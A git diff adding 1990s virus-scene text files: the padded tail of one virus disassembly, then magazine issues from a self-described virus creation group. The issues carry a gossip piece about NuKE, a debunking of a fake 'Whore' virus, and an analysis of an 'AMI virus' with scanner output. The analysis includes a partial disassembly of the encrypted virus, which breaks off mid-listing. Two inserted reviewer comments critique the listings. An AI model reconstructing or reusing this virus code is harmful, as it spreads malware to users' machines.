+ db 7, 24h + db 18 dup (0) +loc_1: ; N-Ref=0 + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + 
add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL 
+ add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr 
[BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte 
Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add 
Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + 
add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL +CODE_SEG_1 ends + + + + end start + diff --git a/textfiles.com/virus/avcr-01.003 b/textfiles.com/virus/avcr-01.003 new file mode 100644 index 00000000..dc5a7c62 --- /dev/null +++ b/textfiles.com/virus/avcr-01.003 
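Review bot: the tail of the ncsa009.txt listing, the long run of "add Byte Ptr [BX+SI],AL" immediately before "CODE_SEG_1 ends", is how a disassembler renders a region of zero bytes (opcode 00 00), so it is padding rather than virus code; collapsing it to a single "db n dup (0)" directive, or at least adding a comment that the region is zero-filled, would keep readers of the listing from treating those hundreds of lines as part of the virus body.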
@@ -0,0 +1,55 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + +> Nuking [NuKE] +> [NuKE] is one of the biggest virus research \ virus creation groups +>out there, as they have their own [NuKE] Net, over 100 megs of viruses, and +>an abundance of members. But can a virus group become TOO big? In truth, the +>answer depends on the answerer, but since I am writing this article I will +>state my point of view. +> Personally, I think that [NuKE] has lost its "magic touch," for it has +>become SO big and SO many people belong to [NuKE] that many less experienced +>members write viruses putting the [NuKE] signature on it, that are hardly up +>to [NuKE]'s great standards. What this does is degrade [NuKE], for +>insignificant varients of insignificant boot viruses that do nothing suddenly +>say [NuKE] on them, which is enough to sicken anyone. +> The next question is, "how to stop the violence?" There is no easy +>answer to that, if you want to go about it in a decent way, but since I am +>not a decent person I would suggest just dropping the less experienced users +>from the group. +> Now I need to praise [NuKE] so they don't kill me ! [NuKE] IS a +>GREAT virus group with few flaws. This is one of their bigger flaws, though, +>since you can't have people saying that they are in a group, yet know nothing +>about what the group is doing! +> Written By: +> Thimble + Well, after reading this garbage I am wondering why somebody +named Thimble would even upload this to the AVCR Magazine section. I +would normally not use this crap in the magazine, but I would like to +comment on this. First of all, NuKE has only a handfull of members, I +don't know where this guy got the idea that NuKE was "GIANT," but I think +that before people write to just get their names in places they should +understand the subject that they are writing on. 
Second of all, NuKE +has only a few "not so great" viruses out, there are no screw-ups trying +to make shitty viruses in NuKE, doesn't look like this guy knows anything +about viruses. + + diff --git a/textfiles.com/virus/avcr-01.004 b/textfiles.com/virus/avcr-01.004 new file mode 100644 index 00000000..2b7504f4 --- /dev/null +++ b/textfiles.com/virus/avcr-01.004 
@@ -0,0 +1,71 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + The Whore Virus + I have recently researched a virus called the Whore. I was told +that this virus was very stealthy, and neither normal nor heuristics scanners +could detect it. This brought about a challenge, thus I decided to research +it. + Patricia Hoffman's VSUM had no information about this virus, and as +claimed, no virus detector could detect this virus. I found only one magazine +that had ANY information on the Whore. SPAM (Sociopathic Programmers Against +McAfee) magazine claimed that the Whore was: "...Incredibly stealthy...it +utilizes the new anti-integrity master code. It's a combination boot/file +infector, infecting .COM, .EXE and .SYS files of over 20k." It also said that +"...if anyone wants a copy of this, you can get it on any SPaM board." + I got a copy of the Whore virus, and upon disassembly of it, and a +clean DOS 5.0 COMMAND.COM, I realized that there is absolutely NO difference +between the Whore "virus" and the clean COMMAND.COM. + Gee, I wonder which great virus creator wrote this one, it's ever +so stealthy ! + Master of Illusion + +Editor's Note: + Upon re-studying the virus and the DOS 5.0 COMMAND.COM and using +our File Compare, I found the following differences: +----------------------------------------------------------------------------- +; FILE CREATED BY FILE COMPARE, +; DEVELOPED BY: +; MICRO PROFESSOR SOFTWARE, +; AMATEUR VIRUS CREATION & RESEARCH GROUP. 
+ + +;---------------------------------------------------------------------------- +var1_0 db 20h +var1_0 db 76h +;---------------------------------------------------------------------------- +var1_1 dd 18C018Ah +var1_1 dd 20202020h +;---------------------------------------------------------------------------- + dd 57000000h + dd 2C495320h +;---------------------------------------------------------------------------- + dd 0BBF14E49h + dd 0BBF13038h +;---------------------------------------------------------------------------- + + There were other differences, but they were insignificant +differences with the comments left by the disassembler. These may or may +not be significant. Due to the size of the WHORE virus, and its disassembly +I can not include it in this file, for it is approximately 700,000 bytes +long, and the virus is 47,845 bytes long, the same size as the DOS 5.0 +COMMAND.COM + Th Patron diff --git a/textfiles.com/virus/avcr-01.005 b/textfiles.com/virus/avcr-01.005 new file mode 100644 index 00000000..6f0f6bec --- /dev/null +++ b/textfiles.com/virus/avcr-01.005 
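Review bot: the Editor's Note in avcr-01.004 undercuts itself, first calling the remaining differences "insignificant" and then saying they "may or may not be significant", and the four listed differences ("var1_0 db 20h" vs "var1_0 db 76h", "dd 57000000h" vs "dd 2C495320h", and so on) carry no file offsets, so a reader cannot tell whether they fall in code or inside a text string, nor reproduce the comparison; the note should give the offsets and say whether the differing bytes sit in a string region, which is what decides whether this is a patched COMMAND.COM or something more.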
@@ -0,0 +1,647 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + Researched By MAS + +Name: The AMI Virus + +Alias: NONE + +Type of Code: Unknown, but probably memory resident. + +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported AMI.COM as: "probably infected by an +unknown virus. +No checksum / recovery information (Anti-Vir.Dat) available. +Suspicious file access. Might be able to infect a file. +Suspicious Memory Allocation. The program uses a non-standard +way to search for, and/or allocate memory. +Found a code decryption routine or debugger trap. This is common +for viruses but also for some copy-protected software. +The program traps the loading of software. Might be a +virus that intercepts program load to infect the software. +Memory resident code. The program might stay resident in memory. +Garbage instructions. Contains code that seems to have no purpose +other than encryption or avoiding recognition by virus scanners. +Undocumented interrupt/DOS call. The program might be just tricky +but can also be a virus using a non-standard way to detect itself. +EXE/COM determination. The program tries to check whether a file +is a COM or EXE file. Viruses need to do this to infect a program. +Found code that can be used to overwrite/move a program in memory. +Found instructions which require a 80186 processor or above. +Encountered instructions which are not likely to be generated by +an assembler, but by some code generator like a polymorphic virus." + +(2) +Frisk Software's F-Protect (F-PROT) reported AMI.COM as: +"C:\AMI\AMI.COM seems to be infected with a virus. +Please contact Frisk Software International to check if this is a known +false alarm or send us a copy for analysis." + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) did not detect the AMI virus. + +(4) +MicroSoft Anti Virus (MSAV.EXE) did not detect the AMI virus. 
+ +Execution Results: + This virus is very stealthy, for no files are changed in size date or +time stamp. Memory size does not change. The virus's size, date, and time +before execution were: + + NAME SIZE DATE TIME +AMI.COM 1703 12-16-93 2:40p + + And after execution they remained unchanged. The only noticible +difference between before execution and after execution is the change in +its code. Below is a comparison of the AMI virus before and after execution, +the top is before execution and the bottom is after execution. +_____________________________________________________________________________ +; FILE CREATED BY FILE COMPARE, +; DEVELOPED BY: +; MICRO PROFESSOR SOFTWARE, +; ALONG WITH AMATEUR VIRUS CREATION & RESEARCH GROUP. + + +;---------------------------------------------------------------------------- + mov SI,Word Ptr var1_100 ; [602D:0100] = 0 + mov SI,Word Ptr var1_100 ; [6342:0100] = 0 +;---------------------------------------------------------------------------- + xor Word Ptr var1_100,SI ; [602D:0100] = 0 + xor Word Ptr var1_100,SI ; [6342:0100] = 0 +;---------------------------------------------------------------------------- + add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh + add DL,Byte Ptr var1_2ee ; [6342:02EE] = 0F27Fh +;---------------------------------------------------------------------------- + mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0 + mov AL,Byte Ptr DS:data_8ee2; [6342:8EE2] = 6399h +;---------------------------------------------------------------------------- + mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0 + mov AL,Byte Ptr DS:data_792e; [6342:792E] = 69A9h +;---------------------------------------------------------------------------- + sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow + sbb Byte Ptr DS:data_461f,BL; [6342:461F] = 1A1Ah Subtract with borrow +;---------------------------------------------------------------------------- + mov AX,Word Ptr DS:data_5f12; [602D:5F12] = 0 + mov AX,Word Ptr 
DS:data_5f12; [6342:5F12] = 53F8h +;---------------------------------------------------------------------------- + db 16h, 0A7h, 58h, 63h + db 16h, 0A7h +;---------------------------------------------------------------------------- +CODE_SEG_1 ends +var1_7a5 db 58h, 63h +;---------------------------------------------------------------------------- + +CODE_SEG_1 ends +;---------------------------------------------------------------------------- + end start + +;---------------------------------------------------------------------------- + + end start +;---------------------------------------------------------------------------- +; END OF FIRST FILE, EXTRA CODE IS FROM SECOND FILE + + +Cleaning Recommendations: + Remove from memory and delete infected files. + +Researcher's Notes: + The AMI virus is very stealthy, for there are no ways, other than +a virus detector, to notice the virus. When the virus is first run there +is no way to realize that it has been run, for there is no character +displaying, speaker noise, etc. 
+ + +----------------------------------------------------------------------------- + Disassembly of the AMI Virus BEFORE Execution +----------------------------------------------------------------------------- + PAGE 60,132 + + +data_10be = 10BEh +data_16d6 = 16D6h +data_2041 = 2041h +data_2b9f = 2B9Fh +data_2ee0 = 2EE0h +data_461f = 461Fh +data_50ee = 50EEh +data_5d91 = 5D91h +data_5f12 = 5F12h +data_681b = 681Bh +data_7162 = 7162h +data_732e = 732Eh +data_7606 = 7606h +data_792e = 792Eh +data_8ee2 = 8EE2h +data_a1ed = 0A1EDh +data_aea5 = 0AEA5h +data_b400 = 0B400h +data_d8db = 0D8DBh +data_ee10 = 0EE10h +data_eeb8 = 0EEB8h +data_faa6 = 0FAA6h + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + add Byte Ptr [BX+SI],AL + add DL,BH + nop ; No operation + nop ; No operation + call near ptr proc_2 +proc_start endp + + + +; +; +; PROCEDURE proc_2 +; +; + +proc_2 proc far + pop BX + sub BX,offset var1_131 + mov SI,Word Ptr var1_100 ; [602D:0100] = 0 + xor Word Ptr var1_100,SI ; [602D:0100] = 0 + lea DI,Word Ptr var1_14d[BX]; Load effective address + mov SI,682h + xor Word Ptr [DI],DI + xor Word Ptr [DI],SI + inc DI + dec SI + jne loc_notfound ; Jump if not equal ( != ) + aaa ; ASCII adjust for addition + xor Byte Ptr [BP+DI+1Fh],CL + + dw 50C0h, 0C951h +var1_12d db 'XPP' + db 8Dh +var1_131 db '`@@@' + db 13h, 0BFh, 40h, 0A0h, 4Ch, 53h + db 0C3h, 57h, 15h, 44h, 18h +var1_140 db '" ' + db 0 +var1_144 db 20h, 9, 3Ah, 0DBh, 7Eh, 79h + db 14h, 0CAh, 16h +var1_14d dw 1110h, 10h, 0E9h + db 5 dup (0) + dw 1810h + db 4 dup (10h) + db 32h, 11h, 3, 26h, 3 +var1_163 db '& ! 
' + db 0Ch, 0BFh + db ']PPPPB@A@@TTTT' + db 0B8h, 50h, 50h, 0Bh, 0D1h, 0BBh + db 0F3h, 51h, 8Eh, 2Ch, 2Fh, 0F4h + db 0A1h, 8Eh, 29h, 27h, 0C6h, 91h + db 0BEh, 1Bh, 17h, 0C8h, 91h, 33h + db 80h, 81h, 0AEh, 0Ah, 7, 0DAh + db 81h, 22h, 92h, 91h, 0C3h, 24h + db 0A0h, 5Dh, 0B1h, 0CBh, 9Ch, 0A2h + db 0D2h, 0B1h, 18h, 5Fh, 0EBh, 93h + db 0AFh, 60h, 0A5h, 9Eh, 72h, 6Eh + db 1Bh, 7, 16h +var1_1b1 db '6L1U' + db 0B8h +var1_1b6 db ']D}' + db 0D8h, 0D4h, 5, 52h, 7Dh, 0ACh + db 0FCh +var1_1c0 db 71h, 22h, 70h +loc_1: ; N-Ref=0 + wait ; Wait for interrupt + add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh + cbw ; Convert byte to word + ror Byte Ptr [BX+SI+3Dh],1 ; Rotate right + call far ptr proc_1 + pop Word Ptr var1_260[SI] + mov BX,0FCF5h + and CH,AH + adc AX,9D0Dh ; ADD with carry + retf ; Return FAR +proc_2 endp + + + + db 92h +var1_1df db '.bnV/' + db 0A2h +var1_1e5 db '^!j' + db 7Fh +var1_1e9 db '&VLT' + db 0B8h, 95h, 0C3h, 5Ch +loc_2: ; N-Ref=1 + inc SP + rcl BX,CL ; Rotate left through carry + rcl BX,CL ; Rotate left through carry + rcl BX,CL ; Rotate left through carry + retn + + db 5 dup (0C3h) + dw 28EBh, 2CA3h, 0ED6Dh, 652Eh + dw 2B8Eh, 86A6h, 0B690h, 0A619h + dw 9091h, 0BA6h, 8396h, 0A680h + dw 8323h, 0B690h, 9656h, 9090h + dw 0BBDDh, 0EA70h, 0A3E5h, 0E548h + dw 652Eh, 0E403h, 0DB00h, 9D8Dh + dw 0B71h, 0BF73h, 